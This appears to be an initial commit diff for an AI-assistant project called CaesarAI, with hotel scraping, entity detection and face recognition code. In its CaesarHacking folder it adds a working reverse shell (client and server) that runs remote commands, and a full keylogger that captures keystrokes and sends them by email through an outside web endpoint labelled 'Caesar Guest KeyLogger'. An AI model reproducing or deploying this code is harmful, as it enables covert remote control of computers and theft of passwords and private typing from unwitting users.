Spaces: CaesarCloudSync
committed on
Commit · 9d3162f · 0 Parent(s)
CaesarAI Deployed
This view is limited to 50 files because it contains too many changes. See raw diff.
- .expo/README.md +15 -0
- .expo/settings.json +8 -0
- .gitattributes +45 -0
- .gitignore +7 -0
- Bookings/alicante_bookings.json +116 -0
- CaesarDetectEntity.py +32 -0
- CaesarEssayGeneration/caesaressaygeneration.py +0 -0
- CaesarEssayGeneration/caesarparaphrasing.py +0 -0
- CaesarFaceDetection/__pycache__/caesarfd.cpython-37.pyc +0 -0
- CaesarFaceDetection/caesarfd.py +48 -0
- CaesarFaceDetection/cascades/haarcascade_fontalface_default.xml +3 -0
- CaesarFaceRecognition/__pycache__/caesardeepface.cpython-37.pyc +0 -0
- CaesarFaceRecognition/caesardeepface.py +50 -0
- CaesarFaceRecognition/testimages/amari.jpg +3 -0
- CaesarFaceRecognition/testimages/amariauth.jpg +3 -0
- CaesarFaceRecognition/testimages/img3.jpg +3 -0
- CaesarHacking/caesarReverseShell/client.py +48 -0
- CaesarHacking/caesarReverseShell/server.py +42 -0
- CaesarHacking/caesarkeylogger.py +135 -0
- CaesarHacking/test.py +3 -0
- CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-37.pyc +0 -0
- CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-39.pyc +0 -0
- CaesarHotelBooking/caesarhotelbooking.py +186 -0
- CaesarLangTranslate/caesarlangtranslate.py +73 -0
- CaesarObjectDetection/CaesarYolo.py +192 -0
- CaesarObjectDetection/README.md +20 -0
- CaesarObjectDetection/__pycache__/CaesarYolo.cpython-37.pyc +0 -0
- CaesarObjectDetection/__pycache__/CaesarYolo.cpython-39.pyc +0 -0
- CaesarObjectDetection/app.py +42 -0
- CaesarObjectDetection/cfg/yolov3.cfg +3 -0
- CaesarObjectDetection/darknet.py +463 -0
- CaesarObjectDetection/data/coco.names +3 -0
- CaesarObjectDetection/images/cat.jpg +3 -0
- CaesarObjectDetection/images/city_scene.jpg +3 -0
- CaesarObjectDetection/images/dog.jpg +3 -0
- CaesarObjectDetection/images/dog2.jpg +3 -0
- CaesarObjectDetection/images/eagle.jpg +3 -0
- CaesarObjectDetection/images/food.jpg +3 -0
- CaesarObjectDetection/images/giraffe.jpg +3 -0
- CaesarObjectDetection/images/horses.jpg +3 -0
- CaesarObjectDetection/images/man-in-black-and-white-jacket-riding-brown-horse-3596689.jpg +3 -0
- CaesarObjectDetection/images/motorbike.jpg +3 -0
- CaesarObjectDetection/images/nathan-rogers-jMmv6HhHb0k-unsplash.jpg +3 -0
- CaesarObjectDetection/images/person.jpg +3 -0
- CaesarObjectDetection/images/street.jpg +3 -0
- CaesarObjectDetection/images/surf.jpg +3 -0
- CaesarObjectDetection/read_video.py +112 -0
- CaesarObjectDetection/requirements.txt +3 -0
- CaesarObjectDetection/sendweb.py +51 -0
- CaesarObjectDetection/stop +1 -0
.expo/README.md
ADDED
@@ -0,0 +1,15 @@
> Why do I have a folder named ".expo" in my project?

The ".expo" folder is created when an Expo project is started using "expo start" command.

> What do the files contain?

- "devices.json": contains information about devices that have recently opened this project. This is used to populate the "Development sessions" list in your development builds.
- "packager-info.json": contains port numbers and process PIDs that are used to serve the application to the mobile device/simulator.
- "settings.json": contains the server configuration that is used to serve the application manifest.

> Should I commit the ".expo" folder?

No, you should not share the ".expo" folder. It does not contain any information that is relevant for other developers working on the project, it is specific to your machine.

Upon project creation, the ".expo" folder is already added to your ".gitignore" file.
.expo/settings.json
ADDED
@@ -0,0 +1,8 @@
{
  "hostType": "lan",
  "lanType": "ip",
  "dev": true,
  "minify": false,
  "urlRandomness": null,
  "https": false
}
.gitattributes
ADDED
@@ -0,0 +1,45 @@
*.7z filter=lfs diff=lfs merge=lfs -text
*.arrow filter=lfs diff=lfs merge=lfs -text
*.bin filter=lfs diff=lfs merge=lfs -text
*.bz2 filter=lfs diff=lfs merge=lfs -text
*.ckpt filter=lfs diff=lfs merge=lfs -text
*.ftz filter=lfs diff=lfs merge=lfs -text
*.gz filter=lfs diff=lfs merge=lfs -text
*.h5 filter=lfs diff=lfs merge=lfs -text
*.joblib filter=lfs diff=lfs merge=lfs -text
*.lfs.* filter=lfs diff=lfs merge=lfs -text
*.mlmodel filter=lfs diff=lfs merge=lfs -text
*.model filter=lfs diff=lfs merge=lfs -text
*.msgpack filter=lfs diff=lfs merge=lfs -text
*.npy filter=lfs diff=lfs merge=lfs -text
*.npz filter=lfs diff=lfs merge=lfs -text
*.onnx filter=lfs diff=lfs merge=lfs -text
*.ot filter=lfs diff=lfs merge=lfs -text
*.parquet filter=lfs diff=lfs merge=lfs -text
*.pb filter=lfs diff=lfs merge=lfs -text
*.pickle filter=lfs diff=lfs merge=lfs -text
*.pkl filter=lfs diff=lfs merge=lfs -text
*.pt filter=lfs diff=lfs merge=lfs -text
*.pth filter=lfs diff=lfs merge=lfs -text
*.rar filter=lfs diff=lfs merge=lfs -text
*.safetensors filter=lfs diff=lfs merge=lfs -text
saved_model/**/* filter=lfs diff=lfs merge=lfs -text
*.tar.* filter=lfs diff=lfs merge=lfs -text
*.tflite filter=lfs diff=lfs merge=lfs -text
*.tgz filter=lfs diff=lfs merge=lfs -text
*.wasm filter=lfs diff=lfs merge=lfs -text
*.xz filter=lfs diff=lfs merge=lfs -text
*.zip filter=lfs diff=lfs merge=lfs -text
*.zst filter=lfs diff=lfs merge=lfs -text
*tfevents* filter=lfs diff=lfs merge=lfs -text
*.jpg filter=lfs diff=lfs merge=lfs -text
*.names filter=lfs diff=lfs merge=lfs -text
*.cfg filter=lfs diff=lfs merge=lfs -text
*.weights filter=lfs diff=lfs merge=lfs -text
hello.mp3 filter=lfs diff=lfs merge=lfs -text
artificial[[:space:]]neural[[:space:]]networks.png filter=lfs diff=lfs merge=lfs -text
caesarapis.json filter=lfs diff=lfs merge=lfs -text
caesartriggers.json filter=lfs diff=lfs merge=lfs -text
*.caffemodel filter=lfs diff=lfs merge=lfs -text
haarcascade_fontalface_default.xml filter=lfs diff=lfs merge=lfs -text
deploy.prototxt.txt filter=lfs diff=lfs merge=lfs -text
.gitignore
ADDED
@@ -0,0 +1,7 @@
res10_300x300_ssd_iter_140000_fp16.caffemodel
deploy.prototxt.txt
CaesarKivy
*.mp4
*.avi
*.wav
beewareenv
Bookings/alicante_bookings.json
ADDED
@@ -0,0 +1,116 @@
{
"alicante_bookings_lower_than_2000": [
{
"address": "Alicante",
"assumed_final_price": 1976.3999999999999,
"assumed_vat": "20.0%",
"booking": "7 nights, 8 adults",
"checkin_date": "2023-8-15",
"checkout_date": "2023-8-22",
"city": "Alicante",
"distance": "0.8 miles from centre",
"location": "https://www.booking.com/hotel/es/beach-5-min-relax.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=15&hapos=15&sr_order=popularity&srpvid=01528e460f4b0724&srepoch=1672949646&all_sr_blocks=865019901_354653449_8_0_0&highlighted_blocks=865019901_354653449_8_0_0&matching_block_id=865019901_354653449_8_0_0&sr_pri_blocks=865019901_354653449_8_0_0__155288&from_beach_sr=1&from=searchresults&map=1",
"price": 1647.0,
"rating": 8.5,
"reviews": "74 reviews",
"room": "Apartment",
"title": "Beach 5 MIN Playa"
},
{
"address": "Alicante",
"assumed_final_price": 1363.2,
"assumed_vat": "20.0%",
"booking": "7 nights, 8 adults",
"checkin_date": "2023-8-15",
"checkout_date": "2023-8-22",
"city": "Alicante",
"distance": "1 miles from centre",
"location": "https://www.booking.com/hotel/es/gonzalo-mengual-apartment.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=23&hapos=23&sr_order=popularity&srpvid=01528e460f4b0724&srepoch=1672949646&all_sr_blocks=368159701_295762440_8_0_0&highlighted_blocks=368159701_295762440_8_0_0&matching_block_id=368159701_295762440_8_0_0&sr_pri_blocks=368159701_295762440_8_0_0__107100&from_beach_sr=1&from=searchresults&map=1",
"price": 1136.0,
"rating": 7.5,
"reviews": "97 reviews",
"room": "Apartment",
"title": "Very best flat with sea view, just 800m Postiguet-Beach"
},
{
"address": "Alicante",
"assumed_final_price": 1363.2,
"assumed_vat": "20.0%",
"booking": "7 nights, 8 adults",
"checkin_date": "2023-8-15",
"checkout_date": "2023-8-22",
"city": "Alicante",
"distance": "1 miles from centre",
"location": "https://www.booking.com/hotel/es/gonzalo-mengual-apartment.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=1&hapos=26&sr_order=popularity&srpvid=44078e50e09a0255&srepoch=1672949666&all_sr_blocks=368159701_295762440_8_0_0&highlighted_blocks=368159701_295762440_8_0_0&matching_block_id=368159701_295762440_8_0_0&sr_pri_blocks=368159701_295762440_8_0_0__107100&from_beach_sr=1&from=searchresults&map=1",
"price": 1136.0,
"rating": 9.2,
"reviews": "17 reviews",
"room": "Apartment",
"title": "Very best flat with sea view, just 800m Postiguet-Beach"
},
{
"address": "Alicante",
"assumed_final_price": 1959.6,
"assumed_vat": "20.0%",
"booking": "7 nights, 8 adults",
"checkin_date": "2023-8-15",
"checkout_date": "2023-8-22",
"city": "Alicante",
"distance": "0.4 miles from centre",
"location": "https://www.booking.com/hotel/es/espacioso-luminoso-coqueto-y-muy-centrico.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=18&hapos=43&sr_order=popularity&srpvid=44078e50e09a0255&srepoch=1672949666&all_sr_blocks=460841701_167414053_8_0_0&highlighted_blocks=460841701_167414053_8_0_0&matching_block_id=460841701_167414053_8_0_0&sr_pri_blocks=460841701_167414053_8_0_0__154000&from_beach_sr=1&from=searchresults&map=1",
"price": 1633.0,
"rating": 6.7,
"reviews": "4 reviews",
"room": "Apartment",
"title": "Espacioso, luminoso, coqueto, y muy céntrico"
},
{
"address": "Alicante",
"assumed_final_price": 1585.2,
"assumed_vat": "20.0%",
"booking": "7 nights, 8 adults",
"checkin_date": "2023-8-15",
"checkout_date": "2023-8-22",
"city": "Alicante",
"distance": "0.4 miles from centre",
"location": "https://www.booking.com/hotel/es/duplex-apartment-in-apart-alicante-center-with-private-terrace-and-jacuzzi.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=3&hapos=128&sr_order=popularity&srpvid=04db8e76e60c0946&srepoch=1672949742&all_sr_blocks=856186404_353169334_0_0_0%2C856186402_353169334_0_0_0&highlighted_blocks=856186404_353169334_0_0_0%2C856186402_353169334_0_0_0&matching_block_id=856186404_353169334_0_0_0&sr_pri_blocks=856186404_353169334_0_0_0__69552%2C856186402_353169334_0_0_0__55062&from_beach_sr=1&from=searchresults&map=1",
"price": 1321.0,
"rating": 8.3,
"reviews": "4 reviews",
"room": "Studio Apartment",
"title": "Happy Life Apartments"
},
{
"address": "Alicante",
"assumed_final_price": 1904.3999999999999,
"assumed_vat": "20.0%",
"booking": "7 nights, 8 adults",
"checkin_date": "2023-8-15",
"checkout_date": "2023-8-22",
"city": "Alicante",
"distance": "0.3 miles from centre",
"location": "https://www.booking.com/hotel/es/the-market-hostel.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=20&hapos=170&sr_order=popularity&srpvid=4b6a8e7ff36d0089&srepoch=1672949760&all_sr_blocks=385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0&highlighted_blocks=385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0&matching_block_id=385580305_337859799_0_0_0&sr_pri_blocks=385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580304_337859799_0_0_0__19139%2C385580304_337859799_0_0_0__19139%2C385580304_337859799_0_0_0__19139&from_beach_sr=1&from=searchresults&map=1",
"price": 1587.0,
"rating": 8.7,
"reviews": "886 reviews",
"room": "Bed in 10-Bed Mixed Dormitory Room",
"title": "The Market Hostel"
},
{
"address": "Alicante",
"assumed_final_price": 1514.3999999999999,
"assumed_vat": "20.0%",
"booking": "7 nights, 8 adults",
"checkin_date": "2023-8-15",
"checkout_date": "2023-8-22",
"city": "Alicante",
"distance": "1.8 miles from centre",
"location": "https://www.booking.com/hotel/es/carrer-abad-fernandez-helguera.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=21&hapos=171&sr_order=popularity&srpvid=4b6a8e7ff36d0089&srepoch=1672949760&all_sr_blocks=922570301_363985271_2_0_0%2C922570305_363985271_2_0_0%2C922570303_363985271_2_0_0%2C922570304_363985271_2_0_0&highlighted_blocks=922570301_363985271_2_0_0%2C922570305_363985271_2_0_0%2C922570303_363985271_2_0_0%2C922570304_363985271_2_0_0&matching_block_id=922570301_363985271_2_0_0&sr_pri_blocks=922570301_363985271_2_0_0__21000%2C922570305_363985271_2_0_0__28000%2C922570303_363985271_2_0_0__31500%2C922570304_363985271_2_0_0__38500&from_beach_sr=1&from_sustainable_property_sr=1&from=searchresults&map=1",
"price": 1262.0,
"rating": 4.2,
"reviews": "22 reviews",
"room": "Economy Double Room",
"title": "Carrer Abad Fernández Helguera"
}
]
}
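A minimal sketch of how this data can be consumed downstream (the path and the 1500 budget are illustrative, not part of the commit; the key name matches the JSON above):

```python
import json

# Load the scraped bookings and keep only entries under a chosen budget.
with open("Bookings/alicante_bookings.json") as f:
    bookings = json.load(f)["alicante_bookings_lower_than_2000"]

cheap = [b for b in bookings if b.get("assumed_final_price", float("inf")) <= 1500]
for b in sorted(cheap, key=lambda b: b["assumed_final_price"]):
    print(f'{b["title"]} - {b["assumed_final_price"]:.2f} (rating {b["rating"]})')
```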
CaesarDetectEntity.py
ADDED
@@ -0,0 +1,32 @@
import re
import spacy
import gtts
class CaesarDetectEntity:
    def __init__(self):
        self.languages = {v: k for k, v in gtts.lang.tts_langs().items()}
        self.NER = spacy.load("en_core_web_sm")
        self.main_entities = {"email": "ORG", "translate": "NORP"}
    def index_of_word(self, word, text):
        matches_start = re.finditer(word.lower(), text.lower())
        matches_position_start = [match.start() for match in matches_start]

        # matches_position_end will be a list of ending index positions
        matches_end = re.finditer(word.lower(), text.lower())
        matches_position_end = [match.end() for match in matches_end]
        return matches_position_start[0], matches_position_end[0]
    def show_entites(self, text):
        text1 = self.NER(text)
        for word in text1.ents:
            print(word.text, word.label_)
    def run(self, word, text, entity="NORP"):
        try:
            text1 = self.NER(text)
            target_lang = [word.text for word in text1.ents if word.label_ == entity][0]
            source_text = text[self.index_of_word(word, text)[-1]:self.index_of_word(target_lang, text)[0]].replace(" to", "").replace(" into", "").replace(" in", "").strip()
            #api_call = f"translate({source_text},'{self.languages[target_lang.capitalize()]}')"
            return source_text, self.languages[target_lang.capitalize()]
        except (IndexError, KeyError) as kex:
            source_text = text[self.index_of_word(word, text)[-1]:].replace(" to", "").replace(" into", "").replace(" in", "").strip()
            #api_call = f"translate({source_text},'{self.languages[target_lang.capitalize()]}')"
            languages = None
            return source_text, languages
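A minimal usage sketch for the entity detector above, assuming the repo root is on the import path and `en_core_web_sm` has been downloaded (`python -m spacy download en_core_web_sm`); the sample sentence is illustrative:

```python
from CaesarDetectEntity import CaesarDetectEntity

# Illustrative: extract the text to translate and the gTTS language code
# from a spoken-style command, using the run() method defined above.
detector = CaesarDetectEntity()
source_text, lang_code = detector.run("translate", "translate good morning into French")
print(source_text, lang_code)  # expected: something like "good morning" and "fr"
```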
CaesarEssayGeneration/caesaressaygeneration.py
ADDED
File without changes
CaesarEssayGeneration/caesarparaphrasing.py
ADDED
File without changes
CaesarFaceDetection/__pycache__/caesarfd.cpython-37.pyc
ADDED
Binary file (1.65 kB)
CaesarFaceDetection/caesarfd.py
ADDED
@@ -0,0 +1,48 @@
import cv2
import numpy as np


class CaesarFaceDetection:
    def __init__(self) -> None:
        # https://raw.githubusercontent.com/opencv/opencv/master/samples/dnn/face_detector/deploy.prototxt
        prototxt_path = "CaesarFaceDetection/weights/deploy.prototxt.txt"
        # https://raw.githubusercontent.com/opencv/opencv_3rdparty/dnn_samples_face_detector_20180205_fp16/res10_300x300_ssd_iter_140000_fp16.caffemodel
        model_path = "CaesarFaceDetection/weights/res10_300x300_ssd_iter_140000_fp16.caffemodel"

        # load Caffe model
        self.model = cv2.dnn.readNetFromCaffe(prototxt_path, model_path)
    def detect_face(self, image, showtext=False, snapcropface=False):
        h, w = image.shape[:2]
        # preprocess the image: resize and perform mean subtraction
        blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), (104.0, 177.0, 123.0))
        # set the image into the input of the neural network
        self.model.setInput(blob)
        # perform inference and get the result
        output = np.squeeze(self.model.forward())
        font_scale = 1.0
        for i in range(0, output.shape[0]):
            # get the confidence
            confidence = output[i, 2]
            # if confidence is above 50%, then draw the surrounding box
            if confidence > 0.5:
                # get the surrounding box coordinates and upscale them to the original image
                box = output[i, 3:7] * np.array([w, h, w, h])
                # convert to integers (np.int was removed in newer NumPy; the built-in int works here)
                start_x, start_y, end_x, end_y = box.astype(int)
                # draw the rectangle surrounding the face
                start_point = (start_x, start_y)
                end_point = (end_x, end_y)
                if snapcropface == True:
                    factor_add = 20
                    crop_img = image[start_y - factor_add:end_y + factor_add, start_x - factor_add:end_x + factor_add]
                    return crop_img
                    #cv2.imshow("cropped", crop_img)
                    #cv2.waitKey(0)

                cv2.rectangle(image, start_point, end_point, color=(255, 0, 0), thickness=2)
                # draw text as well
                if showtext == True:
                    cv2.putText(image, f"{confidence*100:.2f}%", (start_x, start_y-5), cv2.FONT_HERSHEY_SIMPLEX, font_scale, (255, 0, 0), 2)
        if snapcropface != True:
            return image
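A short usage sketch for the detector above, assuming the repo root is on the import path and the two weight files referenced in `__init__` have been downloaded; the image path is illustrative:

```python
import cv2
from CaesarFaceDetection.caesarfd import CaesarFaceDetection

# Illustrative usage: draw face boxes on a test image and save the result.
detector = CaesarFaceDetection()
image = cv2.imread("CaesarFaceRecognition/testimages/amari.jpg")  # any BGR image works
annotated = detector.detect_face(image, showtext=True)
cv2.imwrite("faces_detected.jpg", annotated)
```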
CaesarFaceDetection/cascades/haarcascade_fontalface_default.xml
ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:a1b5468d67aa6c291f3b1d2bf98181844e4d0433c31d696a2198029e0e94bc7b
size 930126
CaesarFaceRecognition/__pycache__/caesardeepface.cpython-37.pyc
ADDED
Binary file (2.3 kB)
CaesarFaceRecognition/caesardeepface.py
ADDED
@@ -0,0 +1,50 @@
from deepface import DeepFace

class CaesarDeepFace:
    """
    https://github.com/serengil/deepface
    """
    def __init__(self) -> None:
        self.metrics = ["cosine", "euclidean", "euclidean_l2"]
        self.models = ["VGG-Face", "Facenet", "Facenet512", "OpenFace", "DeepFace", "DeepID", "ArcFace", "Dlib", "SFace"]
        self.backends = [
            'opencv',
            'ssd',
            'dlib',
            'mtcnn',
            'retinaface',
            'mediapipe'
        ]
    def face_authentication(self, filename1="img1.jpg", filename2="img2.jpg"):
        # face verification
        # Value Error
        try:
            result = DeepFace.verify(img1_path=filename1,
                                     img2_path=filename2,
                                     distance_metric=self.metrics[0],
                                     model_name=self.models[0],
                                     detector_backend=self.backends[0]
                                     )
            return result
        except ValueError as vex:
            return {"message": "Face wasn't detected", "error": f"{type(vex)},{vex}"}
    def face_recognition(self, filename, db_path="C:/workspace/my_db"):
        dfs = DeepFace.find(img_path=filename,
                            db_path=db_path,
                            distance_metric=self.metrics[2])
        return dfs
    def face_analyze(self, filename="img1.jpg"):
        objs = DeepFace.analyze(img_path=filename,
                                actions=['age', 'gender', 'race', 'emotion'])
        return objs
    def face_embeddigns(self, filename):
        embedding_objs = DeepFace.represent(img_path=filename)
        return embedding_objs
    def face_streaming(self, db_path="C:/User/Sefik/Desktop/database"):
        DeepFace.stream(db_path=db_path)


if __name__ == "__main__":
    caesardeepface = CaesarDeepFace()
    result = caesardeepface.face_authentication(filename2="img3.jpg")
    print(result)
CaesarFaceRecognition/testimages/amari.jpg
ADDED
Git LFS Details
CaesarFaceRecognition/testimages/amariauth.jpg
ADDED
Git LFS Details
CaesarFaceRecognition/testimages/img3.jpg
ADDED
Git LFS Details
CaesarHacking/caesarReverseShell/client.py
ADDED
@@ -0,0 +1,48 @@
import socket
import os
import subprocess
import sys

SERVER_HOST = sys.argv[1]
SERVER_PORT = 5003
BUFFER_SIZE = 1024 * 128  # 128KB max size of messages, feel free to increase
# separator string for sending 2 messages in one go
SEPARATOR = "<sep>"

# create the socket object
s = socket.socket()
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))

# get the current directory
cwd = os.getcwd()
s.send(cwd.encode())


while True:
    # receive the command from the server
    command = s.recv(BUFFER_SIZE).decode()
    splited_command = command.split()
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    if splited_command[0].lower() == "cd":
        # cd command, change directory
        try:
            os.chdir(' '.join(splited_command[1:]))
        except FileNotFoundError as e:
            # if there is an error, set as the output
            output = str(e)
        else:
            # if operation is successful, empty message
            output = ""
    else:
        # execute the command and retrieve the results
        output = subprocess.getoutput(command)
    # get the current working directory as output
    cwd = os.getcwd()
    # send the results back to the server
    message = f"{output}{SEPARATOR}{cwd}"
    s.send(message.encode())
# close client connection
s.close()
CaesarHacking/caesarReverseShell/server.py
ADDED
@@ -0,0 +1,42 @@
import socket

SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
BUFFER_SIZE = 1024 * 128  # 128KB max size of messages, feel free to increase
# separator string for sending 2 messages in one go
SEPARATOR = "<sep>"
# create a socket object
s = socket.socket()

# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))

s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")

# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")

# receiving the current working directory of the client
cwd = client_socket.recv(BUFFER_SIZE).decode()
print("[+] Current working directory:", cwd)


while True:
    # get the command from prompt
    command = input(f"{cwd} $> ")
    if not command.strip():
        # empty command
        continue
    # send the command to the client
    client_socket.send(command.encode())
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # retrieve command results
    output = client_socket.recv(BUFFER_SIZE).decode()
    # split command output and current directory
    results, cwd = output.split(SEPARATOR)
    # print output
    print(results)
CaesarHacking/caesarkeylogger.py
ADDED
@@ -0,0 +1,135 @@
import sys
import base64
import keyboard # for keylogs
import requests
import smtplib, ssl # for sending email using SMTP protocol (gmail)
# Timer is to make a method runs after an `interval` amount of time
from threading import Timer
from datetime import datetime
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

class Keylogger:
    def __init__(self, interval, report_method="email"):
        # we gonna pass SEND_REPORT_EVERY to interval
        self.interval = interval
        self.report_method = report_method
        # this is the string variable that contains the log of all
        # the keystrokes within `self.interval`
        self.log = ""
        # record start & end datetimes
        self.start_dt = datetime.now()
        self.end_dt = datetime.now()

    def callback(self, event):
        """
        This callback is invoked whenever a keyboard event is occured
        (i.e when a key is released in this example)
        """
        name = event.name
        if len(name) > 1:
            # not a character, special key (e.g ctrl, alt, etc.)
            # uppercase with []
            if name == "space":
                # " " instead of "space" hello world my name is amari
                name = " "
            elif name == "enter":
                # add a new line whenever an ENTER is pressed
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                # replace spaces with underscores
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        # finally, add the key name to our global `self.log` variable
        self.log += name

    def update_filename(self):
        # construct the filename to be identified by start & end datetimes
        start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
        end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
        self.filename = f"keylog-{start_dt_str}_{end_dt_str}"

    def report_to_file(self):
        """This method creates a log file in the current directory that contains
        the current keylogs in the `self.log` variable"""
        # open the file in write mode (create it)
        with open(f"{self.filename}.txt", "w") as f:
            # write the keylogs to the file
            print(self.log, file=f)
        print(f"[+] Saved {self.filename}.txt")


    def sendmail(self, recipient_email, message, verbose=1):
        # manages a connection to an SMTP server
        # in our case it's for Microsoft365, Outlook, Hotmail, and live.com
        response = requests.post("https://revisionbank-email.onrender.com/raspsendemail", json={"raspsendemail": {"email": recipient_email, "message": message, "subject": "Caesar Guest KeyLogger"}}).json()

        if verbose:
            print(f"{datetime.now()} - Sent an email to {recipient_email} containing: {message}")
            print(response)

    def report(self):
        """
        This function gets called every `self.interval`
        It basically sends keylogs and resets `self.log` variable
        """
        if self.log:
            # if there is something in log, report it
            self.end_dt = datetime.now()
            # update `self.filename`
            self.update_filename()
            if self.report_method == "email":
                self.sendmail(TO_EMAIL_ADDRESS, self.log)
            elif self.report_method == "file":
                self.report_to_file()
            # if you don't want to print in the console, comment below line
            print(f"[{self.filename}] - {self.log}")
            self.start_dt = datetime.now()
        self.log = ""
        timer = Timer(interval=self.interval, function=self.report)
        # set the thread as daemon (dies when main thread die)
        timer.daemon = True
        # start the timer
        timer.start()

    def start(self):
        # record the start datetime
        self.start_dt = datetime.now()
        # start the keylogger
        keyboard.on_release(callback=self.callback)
        # start reporting the keylogs
        self.report()
        # make a simple message
        print(f"{datetime.now()} - Started keylogger")
        # block the current thread, wait until CTRL+C is pressed
        keyboard.wait()


if __name__ == "__main__":
    # in seconds, 60 means 1 minute and so on
    if len(sys.argv) == 3:
        if sys.argv[1] == "help":
            print("caesarkeylogger.exe <recipientemail> <send_report_every>")
        elif sys.argv[1] != "help":
            TO_EMAIL_ADDRESS = sys.argv[1]
            SEND_REPORT_EVERY = int(sys.argv[2])
            # if you want a keylogger to send to your email
            # keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="email")
            # if you want a keylogger to record keylogs to a local file
            # (and then send it using your favorite method)
            past = datetime(2022, 12, 30)
            present = datetime.now()

            if past.date() >= present.date():
                report_method = "email"
            else:
                report_method = "file"

            keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method=report_method)
            keylogger.start()


    elif len(sys.argv) != 3:
        print("caesarkeylogger.exe <recipientemail> <send_report_every>")
CaesarHacking/test.py
ADDED
@@ -0,0 +1,3 @@
from datetime import datetime

CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-37.pyc
ADDED
Binary file (7.75 kB)
CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-39.pyc
ADDED
Binary file (7.84 kB)
CaesarHotelBooking/caesarhotelbooking.py
ADDED
@@ -0,0 +1,186 @@
# -*- coding: utf-8 -*-
import itertools
import re
import sys
import requests
import json
from bs4 import BeautifulSoup
from tqdm import tqdm

class CaesarHotelBooking:
    def __init__(self) -> None:
        pass

    @classmethod
    def create_url(self, city, num_of_adults, num_of_rooms, num_of_children, checkin_date, checkout_date, purpose, page_num=1):
        # pages go in 25 intervals
        self.checkin_date = checkin_date
        self.checkout_date = checkout_date
        self.city = city
        page_num_offset = (page_num - 1) * 25
        url = f"https://www.booking.com/searchresults.en-gb.html?ss={city}&label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&lang=en-gb&sb=1&src_elem=sb&src=searchresults&checkin={checkin_date}&checkout={checkout_date}&group_adults={num_of_adults}&no_rooms={num_of_rooms}&group_children={num_of_children}&sb_travel_purpose={purpose}&offset={page_num_offset}"
        return url
    @staticmethod
    def find_indices(list_to_check, item_to_find):
        indices = []
        for idx, value in enumerate(list_to_check):
            if value == item_to_find:
                indices.append(idx)
        return indices


    @classmethod
    def caesar_get_hotel_info(self, url):
        bookings = []
        assumed_vat_percentage = 0.2
        rating_regex = re.compile(r"^(?=.*?\d)\d*[.,]?\d*$")
